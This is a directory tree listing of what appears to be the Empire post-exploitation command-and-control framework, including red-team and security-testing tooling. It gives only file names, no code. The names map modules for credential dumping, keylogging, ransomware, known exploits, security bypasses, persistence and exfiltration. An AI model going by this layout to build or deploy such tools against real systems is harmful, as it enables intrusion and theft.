├── .dockerignore
├── .github
    ├── CONTRIBUTING.md
    ├── FUNDING.yml
    ├── ISSUE_TEMPLATE
    │   ├── bug_report.yaml
    │   └── feature_request.yaml
    ├── actions
    │   ├── clean-merge
    │   │   └── action.yml
    │   └── update-starkiller
    │   │   └── action.yml
    ├── ci-and-release.md
    ├── cst-config-docker.yaml
    ├── dependabot.yml
    ├── docker-compose.yml
    ├── install_tests
    │   ├── InstallTest.Dockerfile
    │   ├── cst-config-debian.yaml
    │   ├── cst-config-install-base.yaml
    │   ├── cst-config-kali.yaml
    │   ├── cst-config-parrot.yaml
    │   ├── cst-config-ubuntu.yaml
    │   ├── docker-compose-install-tests.yml
    │   └── run-all-cst.sh
    ├── pull_request_template.md
    └── workflows
    │   ├── cherry-pick-main.yml
    │   ├── dockerimage.yml
    │   ├── lint-and-test.yml
    │   ├── prerelease-sponsor-kali-merge-private.yml
    │   ├── release-private-start.yml
    │   ├── release-private-tag.yml
    │   ├── release-public-start.yml
    │   ├── release-public-tag.yml
    │   ├── release-sponsor-kali-start.yml
    │   └── release-sponsor-kali-tag.yml
├── .gitignore
├── .gitmodules
├── .go-version
├── .pre-commit-config.yaml
├── .python-version
├── .yamlfmt.yaml
├── CHANGELOG.md
├── Dockerfile
├── LICENSE
├── README.md
├── changelog
├── conftest.py
├── docs
    ├── .gitbook
    │   └── assets
    │   │   ├── agents_tab.png
    │   │   ├── listeners
    │   │       ├── Malleable_C2
    │   │       │   ├── malleable_listener.png
    │   │       │   └── malleable_profiles.png
    │   │       └── http
    │   │       │   ├── http_listener_optional.png
    │   │       │   ├── http_listener_required.png
    │   │       │   └── welcome.png
    │   │   ├── listeners_tab.png
    │   │   ├── modules.png
    │   │   ├── modules
    │   │       ├── execute_assembly.gif
    │   │       ├── powershell_invoke_script.gif
    │   │       └── python_invoke_script.gif
    │   │   ├── multi_agent_tasking.png
    │   │   ├── plugin-dependencies.png
    │   │   ├── pyvnc.gif
    │   │   ├── server_check_in.png
    │   │   ├── stagers.png
    │   │   ├── stagers
    │   │       └── multi_generate_agent.png
    │   │   └── starkiller_checkin.png
    ├── README.md
    ├── SUMMARY.md
    ├── agents
    │   ├── README.md
    │   ├── go
    │   │   ├── README.md
    │   │   ├── mainagentclass.md
    │   │   ├── packethandlerclass.md
    │   │   └── template.md
    │   ├── python
    │   │   ├── README.md
    │   │   ├── extendedpackethandlerclass.md
    │   │   ├── mainagentclass.md
    │   │   ├── packethandlerclass.md
    │   │   └── stageclass.md
    │   └── staging.md
    ├── database
    │   └── README.md
    ├── listeners
    │   ├── README.md
    │   ├── dropbox.md
    │   ├── http.md
    │   ├── malleable-c2.md
    │   └── onedrive.md
    ├── modules
    │   ├── README.md
    │   ├── autorun_modules.md
    │   └── module-development
    │   │   ├── README.md
    │   │   ├── bof-modules.md
    │   │   ├── c-modules.md
    │   │   ├── powershell-modules.md
    │   │   └── python-modules.md
    ├── plugins
    │   ├── README.md
    │   └── development
    │   │   ├── README.md
    │   │   ├── database-usage.md
    │   │   ├── execution.md
    │   │   ├── hooks-and-filters.md
    │   │   ├── imports.md
    │   │   ├── lifecycle-hooks.md
    │   │   ├── migration.md
    │   │   ├── notifications.md
    │   │   ├── plugin-tasks.md
    │   │   └── settings.md
    ├── quickstart
    │   ├── README.md
    │   ├── installation.md
    │   └── server.md
    ├── restful-api
    │   └── README.md
    ├── settings
    │   ├── README.md
    │   ├── bypasses.md
    │   ├── ip-filtering.md
    │   └── logging.md
    ├── stagers
    │   ├── README.md
    │   └── multi_generate_agent.md
    └── starkiller
    │   ├── README.md
    │   ├── agent-tasks.md
    │   └── introduction.md
├── empire.py
├── empire
    ├── __init__.py
    ├── arguments.py
    ├── server
    │   ├── __init__.py
    │   ├── api
    │   │   ├── __init__.py
    │   │   ├── api_router.py
    │   │   ├── app.py
    │   │   ├── jwt_auth.py
    │   │   ├── middleware.py
    │   │   └── v2
    │   │   │   ├── __init__.py
    │   │   │   ├── admin
    │   │   │       ├── __init__.py
    │   │   │       └── admin_api.py
    │   │   │   ├── agent
    │   │   │       ├── __init__.py
    │   │   │       ├── agent_api.py
    │   │   │       ├── agent_dto.py
    │   │   │       ├── agent_file_api.py
    │   │   │       ├── agent_file_dto.py
    │   │   │       ├── agent_task_api.py
    │   │   │       └── agent_task_dto.py
    │   │   │   ├── bypass
    │   │   │       ├── __init__.py
    │   │   │       ├── bypass_api.py
    │   │   │       └── bypass_dto.py
    │   │   │   ├── credential
    │   │   │       ├── __init__.py
    │   │   │       ├── credential_api.py
    │   │   │       └── credential_dto.py
    │   │   │   ├── download
    │   │   │       ├── __init__.py
    │   │   │       ├── download_api.py
    │   │   │       └── download_dto.py
    │   │   │   ├── host
    │   │   │       ├── __init__.py
    │   │   │       ├── host_api.py
    │   │   │       ├── host_dto.py
    │   │   │       ├── process_api.py
    │   │   │       └── process_dto.py
    │   │   │   ├── ip
    │   │   │       ├── __init__.py
    │   │   │       ├── ip_api.py
    │   │   │       └── ip_dto.py
    │   │   │   ├── listener
    │   │   │       ├── __init__.py
    │   │   │       ├── listener_api.py
    │   │   │       ├── listener_dto.py
    │   │   │       └── listener_template_api.py
    │   │   │   ├── meta
    │   │   │       ├── __init__.py
    │   │   │       ├── meta_api.py
    │   │   │       └── meta_dto.py
    │   │   │   ├── module
    │   │   │       ├── __init__.py
    │   │   │       ├── module_api.py
    │   │   │       └── module_dto.py
    │   │   │   ├── obfuscation
    │   │   │       ├── __init__.py
    │   │   │       ├── obfuscation_api.py
    │   │   │       └── obfuscation_dto.py
    │   │   │   ├── plugin
    │   │   │       ├── __init__.py
    │   │   │       ├── plugin_api.py
    │   │   │       ├── plugin_dto.py
    │   │   │       ├── plugin_registry_api.py
    │   │   │       ├── plugin_registry_dto.py
    │   │   │       ├── plugin_task_api.py
    │   │   │       └── plugin_task_dto.py
    │   │   │   ├── profile
    │   │   │       ├── __init__.py
    │   │   │       ├── profile_api.py
    │   │   │       └── profile_dto.py
    │   │   │   ├── shared_dependencies.py
    │   │   │   ├── shared_dto.py
    │   │   │   ├── stager
    │   │   │       ├── __init__.py
    │   │   │       ├── stager_api.py
    │   │   │       ├── stager_dto.py
    │   │   │       └── stager_template_api.py
    │   │   │   ├── tag
    │   │   │       ├── __init__.py
    │   │   │       ├── tag_api.py
    │   │   │       └── tag_dto.py
    │   │   │   ├── user
    │   │   │       ├── __init__.py
    │   │   │       ├── user_api.py
    │   │   │       └── user_dto.py
    │   │   │   └── websocket
    │   │   │       ├── __init__.py
    │   │   │       └── socketio.py
    │   ├── bypasses
    │   │   ├── ETWBypass.yaml
    │   │   ├── LibermanBypass.yaml
    │   │   ├── MattifestationBypass.yaml
    │   │   ├── RastaMouseBypass.yaml
    │   │   └── ScriptBlockLogBypass.yaml
    │   ├── common
    │   │   ├── __init__.py
    │   │   ├── empire.py
    │   │   ├── encryption.py
    │   │   ├── helpers.py
    │   │   ├── malleable
    │   │   │   ├── LICENSE
    │   │   │   ├── README.md
    │   │   │   ├── __init__.py
    │   │   │   ├── implementation.py
    │   │   │   ├── profile.py
    │   │   │   ├── transaction.py
    │   │   │   ├── transformation.py
    │   │   │   └── utility.py
    │   │   ├── packets.py
    │   │   ├── socks.py
    │   │   └── templating.py
    │   ├── config.yaml
    │   ├── core
    │   │   ├── __init__.py
    │   │   ├── agent_communication_service.py
    │   │   ├── agent_file_service.py
    │   │   ├── agent_service.py
    │   │   ├── agent_socks_service.py
    │   │   ├── agent_task_service.py
    │   │   ├── bypass_service.py
    │   │   ├── config
    │   │   │   ├── config_manager.py
    │   │   │   └── data_manager.py
    │   │   ├── credential_service.py
    │   │   ├── db
    │   │   │   ├── __init__.py
    │   │   │   ├── base.py
    │   │   │   ├── defaults.py
    │   │   │   └── models.py
    │   │   ├── dotnet.py
    │   │   ├── download_service.py
    │   │   ├── exceptions.py
    │   │   ├── go.py
    │   │   ├── hooks.py
    │   │   ├── hooks_internal.py
    │   │   ├── host_process_service.py
    │   │   ├── host_service.py
    │   │   ├── ip_service.py
    │   │   ├── listener_service.py
    │   │   ├── listener_template_service.py
    │   │   ├── module_models.py
    │   │   ├── module_service.py
    │   │   ├── obfuscation_service.py
    │   │   ├── plugin_registry_service.py
    │   │   ├── plugin_service.py
    │   │   ├── plugin_task_service.py
    │   │   ├── plugins.py
    │   │   ├── profile_service.py
    │   │   ├── stager_generation_service.py
    │   │   ├── stager_service.py
    │   │   ├── stager_template_service.py
    │   │   ├── tag_service.py
    │   │   └── user_service.py
    │   ├── data
    │   │   ├── Invoke-Obfuscation
    │   │   │   ├── Invoke-Obfuscation.ps1
    │   │   │   ├── Invoke-Obfuscation.psd1
    │   │   │   ├── Invoke-Obfuscation.psm1
    │   │   │   ├── LICENSE
    │   │   │   ├── Out-CompressedCommand.ps1
    │   │   │   ├── Out-EncodedAsciiCommand.ps1
    │   │   │   ├── Out-EncodedBXORCommand.ps1
    │   │   │   ├── Out-EncodedBinaryCommand.ps1
    │   │   │   ├── Out-EncodedHexCommand.ps1
    │   │   │   ├── Out-EncodedOctalCommand.ps1
    │   │   │   ├── Out-EncodedSpecialCharOnlyCommand.ps1
    │   │   │   ├── Out-EncodedWhitespaceCommand.ps1
    │   │   │   ├── Out-ObfuscatedAst.ps1
    │   │   │   ├── Out-ObfuscatedStringCommand.ps1
    │   │   │   ├── Out-ObfuscatedTokenCommand.ps1
    │   │   │   ├── Out-PowerShellLauncher.ps1
    │   │   │   ├── Out-SecureStringCommand.ps1
    │   │   │   └── README.md
    │   │   ├── __init__.py
    │   │   ├── agent
    │   │   │   ├── __init__.py
    │   │   │   ├── agent.ps1
    │   │   │   ├── agent.py
    │   │   │   ├── gopire
    │   │   │   │   ├── LICENSE
    │   │   │   │   ├── README.md
    │   │   │   │   ├── agent
    │   │   │   │   │   ├── agent.go
    │   │   │   │   │   └── tasks.go
    │   │   │   │   ├── common
    │   │   │   │   │   ├── encryption.go
    │   │   │   │   │   └── utils.go
    │   │   │   │   ├── comms
    │   │   │   │   │   ├── dh.go
    │   │   │   │   │   ├── http.go
    │   │   │   │   │   └── packet_handler.go
    │   │   │   │   ├── go.mod
    │   │   │   │   ├── go.sum
    │   │   │   │   ├── main.template
    │   │   │   │   └── tasks
    │   │   │   │   │   ├── bof.go
    │   │   │   │   │   ├── csharp_task.go
    │   │   │   │   │   ├── directory_list.go
    │   │   │   │   │   ├── files.go
    │   │   │   │   │   └── powershell_task.go
    │   │   │   ├── ironpython_agent.py
    │   │   │   └── stagers
    │   │   │   │   ├── __init__.py
    │   │   │   │   ├── common
    │   │   │   │       ├── aes.py
    │   │   │   │       ├── diffiehellman.py
    │   │   │   │       ├── get_sysinfo.py
    │   │   │   │       └── rc4.py
    │   │   │   │   ├── http
    │   │   │   │       ├── __init__.py
    │   │   │   │       ├── comms.ps1
    │   │   │   │       ├── comms.py
    │   │   │   │       ├── http.ps1
    │   │   │   │       └── http.py
    │   │   │   │   ├── http_malleable
    │   │   │   │       ├── http_malleable.ps1
    │   │   │   │       └── http_malleable.py
    │   │   │   │   └── smb
    │   │   │   │       ├── __init__.py
    │   │   │   │       ├── comms.py
    │   │   │   │       └── smb.py
    │   │   ├── listeners
    │   │   │   └── templates
    │   │   │   │   ├── default.html
    │   │   │   │   ├── index.html
    │   │   │   │   └── method_not_allowed.html
    │   │   ├── misc
    │   │   │   ├── ReflectivePick_x64_orig.dll
    │   │   │   ├── ReflectivePick_x86_orig.dll
    │   │   │   ├── Run.java
    │   │   │   ├── apptemplateResources
    │   │   │   │   ├── empty
    │   │   │   │   │   └── macho
    │   │   │   │   ├── icon
    │   │   │   │   │   └── stormtrooper.icns
    │   │   │   │   ├── x64
    │   │   │   │   │   └── launcher.app
    │   │   │   │   │   │   └── Contents
    │   │   │   │   │   │       ├── Info.plist
    │   │   │   │   │   │       ├── MacOS
    │   │   │   │   │   │           └── launcher
    │   │   │   │   │   │       ├── PkgInfo
    │   │   │   │   │   │       ├── Resources
    │   │   │   │   │   │           └── Base.lproj
    │   │   │   │   │   │           │   └── MainMenu.nib
    │   │   │   │   │   │       └── _CodeSignature
    │   │   │   │   │   │           └── CodeResources
    │   │   │   │   └── x86
    │   │   │   │   │   └── launcher.app
    │   │   │   │   │       └── Contents
    │   │   │   │   │           ├── Info.plist
    │   │   │   │   │           ├── MacOS
    │   │   │   │   │               └── launcher
    │   │   │   │   │           ├── PkgInfo
    │   │   │   │   │           ├── Resources
    │   │   │   │   │               └── Base.lproj
    │   │   │   │   │               │   └── MainMenu.nib
    │   │   │   │   │           └── _CodeSignature
    │   │   │   │   │               └── CodeResources
    │   │   │   ├── hijackers
    │   │   │   │   ├── template.dylib
    │   │   │   │   └── template64.dylib
    │   │   │   ├── hop.php
    │   │   │   ├── machotemplate
    │   │   │   ├── pkgbuild
    │   │   │   │   ├── expand
    │   │   │   │   │   └── PackageInfo
    │   │   │   │   ├── root
    │   │   │   │   │   └── Applications
    │   │   │   │   │   │   └── test
    │   │   │   │   └── scripts
    │   │   │   │   │   └── postinstall
    │   │   │   ├── python_modules
    │   │   │   │   └── mss.zip
    │   │   │   ├── templateLauncher.dylib
    │   │   │   ├── templateLauncher64.dylib
    │   │   │   ├── templateSource
    │   │   │   │   ├── Dylib.c
    │   │   │   │   └── macho.m
    │   │   │   ├── welcome.png
    │   │   │   ├── x64_slim.dll
    │   │   │   └── x86_slim.dll
    │   │   └── module_source
    │   │   │   ├── bof
    │   │   │       ├── ClipboardWindow
    │   │   │       │   └── ClipboardWindow-Inject.x64.o
    │   │   │       ├── cobaltwhispers
    │   │   │       │   └── SpawnProcess.o
    │   │   │       ├── nanodump
    │   │   │       │   ├── nanodump.x64.o
    │   │   │       │   └── nanodump.x86.o
    │   │   │       ├── secinject
    │   │   │       │   └── secinject.x64.o
    │   │   │       ├── situational_awareness
    │   │   │       │   ├── adcs_enum
    │   │   │       │   │   ├── adcs_enum.x64.o
    │   │   │       │   │   └── adcs_enum.x86.o
    │   │   │       │   ├── adcs_enum_com
    │   │   │       │   │   ├── adcs_enum_com.x64.o
    │   │   │       │   │   └── adcs_enum_com.x86.o
    │   │   │       │   ├── adcs_enum_com2
    │   │   │       │   │   ├── adcs_enum_com2.x64.o
    │   │   │       │   │   └── adcs_enum_com2.x86.o
    │   │   │       │   ├── adv_audit_policies
    │   │   │       │   │   ├── adv_audit_policies.x64.o
    │   │   │       │   │   └── adv_audit_policies.x86.o
    │   │   │       │   ├── arp
    │   │   │       │   │   ├── arp.x64.o
    │   │   │       │   │   └── arp.x86.o
    │   │   │       │   ├── cacls
    │   │   │       │   │   ├── cacls.x64.o
    │   │   │       │   │   └── cacls.x86.o
    │   │   │       │   ├── driversigs
    │   │   │       │   │   ├── driversigs.x64.o
    │   │   │       │   │   └── driversigs.x86.o
    │   │   │       │   ├── enum_filter_driver
    │   │   │       │   │   ├── enum_filter_driver.x64.o
    │   │   │       │   │   └── enum_filter_driver.x86.o
    │   │   │       │   ├── enumlocalsessions
    │   │   │       │   │   ├── enumlocalsessions.x64.o
    │   │   │       │   │   └── enumlocalsessions.x86.o
    │   │   │       │   ├── env
    │   │   │       │   │   ├── env.x64.o
    │   │   │       │   │   └── env.x86.o
    │   │   │       │   ├── findLoadedModule
    │   │   │       │   │   ├── findLoadedModule.x64.o
    │   │   │       │   │   └── findLoadedModule.x86.o
    │   │   │       │   ├── get-netsession
    │   │   │       │   │   ├── get-netsession.x64.o
    │   │   │       │   │   └── get-netsession.x86.o
    │   │   │       │   ├── get_password_policy
    │   │   │       │   │   ├── get_password_policy.x64.o
    │   │   │       │   │   └── get_password_policy.x86.o
    │   │   │       │   ├── ipconfig
    │   │   │       │   │   ├── ipconfig.x64.o
    │   │   │       │   │   └── ipconfig.x86.o
    │   │   │       │   ├── ldapsearch
    │   │   │       │   │   ├── ldapsearch.x64.o
    │   │   │       │   │   └── ldapsearch.x86.o
    │   │   │       │   ├── list_firewall_rules
    │   │   │       │   │   ├── list_firewall_rules.x64.o
    │   │   │       │   │   └── list_firewall_rules.x86.o
    │   │   │       │   ├── listdns
    │   │   │       │   │   ├── listdns.x64.o
    │   │   │       │   │   └── listdns.x86.o
    │   │   │       │   ├── listmods
    │   │   │       │   │   ├── listmods.x64.o
    │   │   │       │   │   └── listmods.x86.o
    │   │   │       │   ├── locale
    │   │   │       │   │   ├── locale.x64.o
    │   │   │       │   │   └── locale.x86.o
    │   │   │       │   ├── netgroup
    │   │   │       │   │   ├── netgroup.x64.o
    │   │   │       │   │   └── netgroup.x86.o
    │   │   │       │   ├── netlocalgroup
    │   │   │       │   │   ├── netlocalgroup.x64.o
    │   │   │       │   │   └── netlocalgroup.x86.o
    │   │   │       │   ├── netloggedon
    │   │   │       │   │   ├── netloggedon.x64.o
    │   │   │       │   │   └── netloggedon.x86.o
    │   │   │       │   ├── netshares
    │   │   │       │   │   ├── netshares.x64.o
    │   │   │       │   │   └── netshares.x86.o
    │   │   │       │   ├── netstat
    │   │   │       │   │   ├── netstat.x64.o
    │   │   │       │   │   └── netstat.x86.o
    │   │   │       │   ├── nettime
    │   │   │       │   │   ├── nettime.x64.o
    │   │   │       │   │   └── nettime.x86.o
    │   │   │       │   ├── netuptime
    │   │   │       │   │   ├── netuptime.x64.o
    │   │   │       │   │   └── netuptime.x86.o
    │   │   │       │   ├── netuse
    │   │   │       │   │   ├── netuse.x64.o
    │   │   │       │   │   └── netuse.x86.o
    │   │   │       │   ├── netuser
    │   │   │       │   │   ├── netuser.x64.o
    │   │   │       │   │   └── netuser.x86.o
    │   │   │       │   ├── netuserenum
    │   │   │       │   │   ├── netuserenum.x64.o
    │   │   │       │   │   └── netuserenum.x86.o
    │   │   │       │   ├── netview
    │   │   │       │   │   ├── netview.x64.o
    │   │   │       │   │   └── netview.x86.o
    │   │   │       │   ├── nonpagedldapsearch
    │   │   │       │   │   ├── nonpagedldapsearch.x64.o
    │   │   │       │   │   └── nonpagedldapsearch.x86.o
    │   │   │       │   ├── notepad
    │   │   │       │   │   ├── notepad.x64.o
    │   │   │       │   │   └── notepad.x86.o
    │   │   │       │   ├── nslookup
    │   │   │       │   │   ├── nslookup.x64.o
    │   │   │       │   │   └── nslookup.x86.o
    │   │   │       │   ├── probe
    │   │   │       │   │   ├── probe.x64.o
    │   │   │       │   │   └── probe.x86.o
    │   │   │       │   ├── reg_query
    │   │   │       │   │   ├── reg_query.x64.o
    │   │   │       │   │   └── reg_query.x86.o
    │   │   │       │   ├── resources
    │   │   │       │   │   ├── resources.x64.o
    │   │   │       │   │   └── resources.x86.o
    │   │   │       │   ├── routeprint
    │   │   │       │   │   ├── routeprint.x64.o
    │   │   │       │   │   └── routeprint.x86.o
    │   │   │       │   ├── sc_enum
    │   │   │       │   │   ├── sc_enum.x64.o
    │   │   │       │   │   └── sc_enum.x86.o
    │   │   │       │   ├── sc_qc
    │   │   │       │   │   ├── sc_qc.x64.o
    │   │   │       │   │   └── sc_qc.x86.o
    │   │   │       │   ├── sc_qdescription
    │   │   │       │   │   ├── sc_qdescription.x64.o
    │   │   │       │   │   └── sc_qdescription.x86.o
    │   │   │       │   ├── sc_qfailure
    │   │   │       │   │   ├── sc_qfailure.x64.o
    │   │   │       │   │   └── sc_qfailure.x86.o
    │   │   │       │   ├── sc_qtriggerinfo
    │   │   │       │   │   ├── sc_qtriggerinfo.x64.o
    │   │   │       │   │   └── sc_qtriggerinfo.x86.o
    │   │   │       │   ├── sc_query
    │   │   │       │   │   ├── sc_query.x64.o
    │   │   │       │   │   └── sc_query.x86.o
    │   │   │       │   ├── schtasksenum
    │   │   │       │   │   ├── schtasksenum.x64.o
    │   │   │       │   │   └── schtasksenum.x86.o
    │   │   │       │   ├── schtasksquery
    │   │   │       │   │   ├── schtasksquery.x64.o
    │   │   │       │   │   └── schtasksquery.x86.o
    │   │   │       │   ├── tasklist
    │   │   │       │   │   ├── tasklist.x64.o
    │   │   │       │   │   └── tasklist.x86.o
    │   │   │       │   ├── uptime
    │   │   │       │   │   ├── uptime.x64.o
    │   │   │       │   │   └── uptime.x86.o
    │   │   │       │   ├── vssenum
    │   │   │       │   │   ├── vssenum.x64.o
    │   │   │       │   │   └── vssenum.x86.o
    │   │   │       │   ├── whoami
    │   │   │       │   │   ├── whoami.x64.o
    │   │   │       │   │   └── whoami.x86.o
    │   │   │       │   ├── windowlist
    │   │   │       │   │   ├── windowlist.x64.o
    │   │   │       │   │   └── windowlist.x86.o
    │   │   │       │   └── wmi_query
    │   │   │       │   │   ├── wmi_query.x64.o
    │   │   │       │   │   └── wmi_query.x86.o
    │   │   │       └── tgtdelegation
    │   │   │       │   ├── tgtdelegation.x64.o
    │   │   │       │   └── tgtdelegation.x86.o
    │   │   │   ├── code_execution
    │   │   │       ├── Invoke-Assembly.ps1
    │   │   │       ├── Invoke-Bof.ps1
    │   │   │       ├── Invoke-Boolang.ps1
    │   │   │       ├── Invoke-ClearScript.ps1
    │   │   │       ├── Invoke-DllInjection.ps1
    │   │   │       ├── Invoke-IronPython.ps1
    │   │   │       ├── Invoke-IronPython3.ps1
    │   │   │       ├── Invoke-MetasploitPayload.ps1
    │   │   │       ├── Invoke-Ntsd.ps1
    │   │   │       ├── Invoke-SSharp.ps1
    │   │   │       ├── Invoke-Script.ps1
    │   │   │       ├── Invoke-Shellcode.ps1
    │   │   │       ├── Invoke-ShellcodeMSIL.ps1
    │   │   │       ├── ntsd_x64.exe
    │   │   │       ├── ntsd_x86.exe
    │   │   │       ├── ntsdexts_x64.dll
    │   │   │       └── ntsdexts_x86.dll
    │   │   │   ├── collection
    │   │   │       ├── Get-BrowserData.ps1
    │   │   │       ├── Get-ChromeDump.ps1
    │   │   │       ├── Get-ClipboardContents.ps1
    │   │   │       ├── Get-FoxDump.ps1
    │   │   │       ├── Get-IndexedItem.ps1
    │   │   │       ├── Get-Keystrokes.ps1
    │   │   │       ├── Get-SQLColumnSampleData.ps1
    │   │   │       ├── Get-SQLQuery.ps1
    │   │   │       ├── Get-Screenshot.ps1
    │   │   │       ├── Get-SharpChromium.ps1
    │   │   │       ├── Get-USBKeystrokes.ps1
    │   │   │       ├── Get-WinUpdates.ps1
    │   │   │       ├── Invoke-CredentialPhisher.ps1
    │   │   │       ├── Invoke-Inveigh.ps1
    │   │   │       ├── Invoke-NetRipper.ps1
    │   │   │       ├── Invoke-NinjaCopy.ps1
    │   │   │       ├── Invoke-SauronEye.ps1
    │   │   │       ├── Invoke-SharpLoginPrompt.ps1
    │   │   │       ├── Invoke-WireTap.ps1
    │   │   │       ├── Out-Minidump.ps1
    │   │   │       └── vaults
    │   │   │       │   ├── KeePassConfig.ps1
    │   │   │       │   └── KeeThief.ps1
    │   │   │   ├── credentials
    │   │   │       ├── DomainPasswordSpray.ps1
    │   │   │       ├── Get-LAPSPasswords.ps1
    │   │   │       ├── Get-VaultCredential.ps1
    │   │   │       ├── Invoke-CredentialInjection.ps1
    │   │   │       ├── Invoke-DCSync.ps1
    │   │   │       ├── Invoke-InternalMonologue.ps1
    │   │   │       ├── Invoke-Kerberoast.ps1
    │   │   │       ├── Invoke-Mimikatz.ps1
    │   │   │       ├── Invoke-NTLMExtract.ps1
    │   │   │       ├── Invoke-PowerDump.ps1
    │   │   │       ├── Invoke-Rubeus.ps1
    │   │   │       ├── Invoke-SessionGopher.ps1
    │   │   │       ├── Invoke-SharpSecDump.ps1
    │   │   │       ├── Invoke-TokenManipulation.ps1
    │   │   │       └── dumpCredStore.ps1
    │   │   │   ├── exfil
    │   │   │       ├── Invoke-EgressCheck.ps1
    │   │   │       ├── Invoke-ExfilDataToGitHub.ps1
    │   │   │       ├── Invoke-PostExfil.ps1
    │   │   │       └── PSRansom.ps1
    │   │   │   ├── exploitation
    │   │   │       ├── Exploit-EternalBlue.ps1
    │   │   │       ├── Exploit-JBoss.ps1
    │   │   │       ├── Exploit-Jenkins.ps1
    │   │   │       └── Invoke-SpoolSample.ps1
    │   │   │   ├── fun
    │   │   │       ├── Invoke-BSOD.ps1
    │   │   │       ├── Invoke-Thunderstruck.ps1
    │   │   │       ├── Invoke-VoiceTroll.ps1
    │   │   │       └── Set-Wallpaper.ps1
    │   │   │   ├── lateral_movement
    │   │   │       ├── Invoke-DCOM.ps1
    │   │   │       ├── Invoke-ExecuteMSBuild.ps1
    │   │   │       ├── Invoke-InveighRelay.ps1
    │   │   │       ├── Invoke-PortFwd.ps1
    │   │   │       ├── Invoke-PsExec.ps1
    │   │   │       ├── Invoke-SMBExec.ps1
    │   │   │       ├── Invoke-SQLOSCmd.ps1
    │   │   │       └── Invoke-SSHCommand.ps1
    │   │   │   ├── management
    │   │   │       ├── Invoke-DownloadFile.ps1
    │   │   │       ├── Invoke-PSInject.ps1
    │   │   │       ├── Invoke-Phant0m.ps1
    │   │   │       ├── Invoke-ReflectivePEInjection.ps1
    │   │   │       ├── Invoke-RunAs.ps1
    │   │   │       ├── Invoke-SharpChiselClient.ps1
    │   │   │       ├── Invoke-SocksProxy.psm1
    │   │   │       ├── Invoke-Vnc.ps1
    │   │   │       ├── MailRaider.ps1
    │   │   │       ├── New-HoneyHash.ps1
    │   │   │       ├── Set-MacAttribute.ps1
    │   │   │       ├── Start-ProcessAsUser.ps1
    │   │   │       └── powercat.ps1
    │   │   │   ├── persistence
    │   │   │       ├── Get-SecurityPackages.ps1
    │   │   │       ├── Install-SSP.ps1
    │   │   │       ├── Invoke-BackdoorLNK.ps1
    │   │   │       ├── Invoke-PhishingLNK.ps1
    │   │   │       ├── Invoke-RIDHijacking.ps1
    │   │   │       ├── Persistence.psm1
    │   │   │       └── PowerBreach.ps1
    │   │   │   ├── privesc
    │   │   │       ├── Get-GPPPassword.ps1
    │   │   │       ├── Get-SiteListPassword.ps1
    │   │   │       ├── Get-System.ps1
    │   │   │       ├── Invoke-BypassUAC.ps1
    │   │   │       ├── Invoke-BypassUACTokenManipulation.ps1
    │   │   │       ├── Invoke-EnvBypass.ps1
    │   │   │       ├── Invoke-EventVwrBypass.ps1
    │   │   │       ├── Invoke-FodHelperBypass.ps1
    │   │   │       ├── Invoke-MS16032.ps1
    │   │   │       ├── Invoke-MS16135.ps1
    │   │   │       ├── Invoke-PrintDemon.ps1
    │   │   │       ├── Invoke-Printnightmare.ps1
    │   │   │       ├── Invoke-SDCLTBypass.ps1
    │   │   │       ├── Invoke-SweetPotato.ps1
    │   │   │       ├── Invoke-Tater.ps1
    │   │   │       ├── Invoke-WScriptBypassUAC.ps1
    │   │   │       ├── Invoke-Watson.ps1
    │   │   │       ├── Invoke-ZeroLogon.ps1
    │   │   │       ├── Invoke-winPEAS.ps1
    │   │   │       ├── PowerUp.ps1
    │   │   │       ├── PrivescCheck.ps1
    │   │   │       └── Sherlock.ps1
    │   │   │   ├── python
    │   │   │       ├── code_execution
    │   │   │       │   └── invoke_script.py
    │   │   │       ├── collection
    │   │   │       │   ├── TicketDumper.py
    │   │   │       │   └── mimipenguin.py
    │   │   │       ├── discovery
    │   │   │       │   └── nameserver.py
    │   │   │       ├── management
    │   │   │       │   └── socks.py
    │   │   │       ├── privesc
    │   │   │       │   ├── CVE-2021-3560.py
    │   │   │       │   ├── CVE-2021-4034.py
    │   │   │       │   └── linuxprivchecker.py
    │   │   │       └── situational_awareness
    │   │   │       │   └── LinPEAS.py
    │   │   │   ├── recon
    │   │   │       ├── Fetch-And-Brute-Local-Accounts.ps1
    │   │   │       ├── Find-Fruit.ps1
    │   │   │       ├── Get-SQLServerLoginDefaultPw.ps1
    │   │   │       └── HTTP-Login.ps1
    │   │   │   ├── situational_awareness
    │   │   │       ├── host
    │   │   │       │   ├── Find-TrustedDocuments.ps1
    │   │   │       │   ├── Get-ComputerDetails.ps1
    │   │   │       │   ├── Get-SystemDNSServer.ps1
    │   │   │       │   ├── HostRecon.ps1
    │   │   │       │   ├── Invoke-Paranoia.ps1
    │   │   │       │   ├── Invoke-Seatbelt.ps1
    │   │   │       │   ├── Invoke-WinEnum.ps1
    │   │   │       │   └── Start-MonitorTCPConnections.ps1
    │   │   │       └── network
    │   │   │       │   ├── BloodHound3.ps1
    │   │   │       │   ├── Get-KerberosServiceTicket.ps1
    │   │   │       │   ├── Get-SPN.ps1
    │   │   │       │   ├── Get-SQLInstanceDomain.ps1
    │   │   │       │   ├── Get-SQLServerInfo.ps1
    │   │   │       │   ├── Invoke-ARPScan.ps1
    │   │   │       │   ├── Invoke-Portscan.ps1
    │   │   │       │   ├── Invoke-ReverseDNSLookup.ps1
    │   │   │       │   ├── Invoke-SMBAutoBrute.ps1
    │   │   │       │   ├── Invoke-SMBLogin.ps1
    │   │   │       │   ├── Invoke-SmbScanner.ps1
    │   │   │       │   ├── SharpHound.ps1
    │   │   │       │   ├── powermad.ps1
    │   │   │       │   └── powerview.ps1
    │   │   │   └── trollsploit
    │   │   │       └── Get-RickAstley.ps1
    │   ├── listeners
    │   │   ├── http.py
    │   │   ├── http_foreign.py
    │   │   ├── http_hop.py
    │   │   ├── http_malleable.py
    │   │   ├── port_forward_pivot.py
    │   │   ├── smb.py
    │   │   └── template.py
    │   ├── modules
    │   │   ├── bof
    │   │   │   ├── clipboard_window_inject.py
    │   │   │   ├── clipboard_window_inject.yaml
    │   │   │   ├── injection
    │   │   │   │   └── SpawnProcess.yaml
    │   │   │   ├── nanodump.py
    │   │   │   ├── nanodump.yaml
    │   │   │   ├── secinject.py
    │   │   │   ├── secinject.yaml
    │   │   │   ├── situational_awareness
    │   │   │   │   ├── adcs_enum.yaml
    │   │   │   │   ├── adcs_enum_com.yaml
    │   │   │   │   ├── adcs_enum_com2.yaml
    │   │   │   │   ├── adv_audit_policies.yaml
    │   │   │   │   ├── arp.yaml
    │   │   │   │   ├── cacls.yaml
    │   │   │   │   ├── driversigs.yaml
    │   │   │   │   ├── enumLocalSessions.yaml
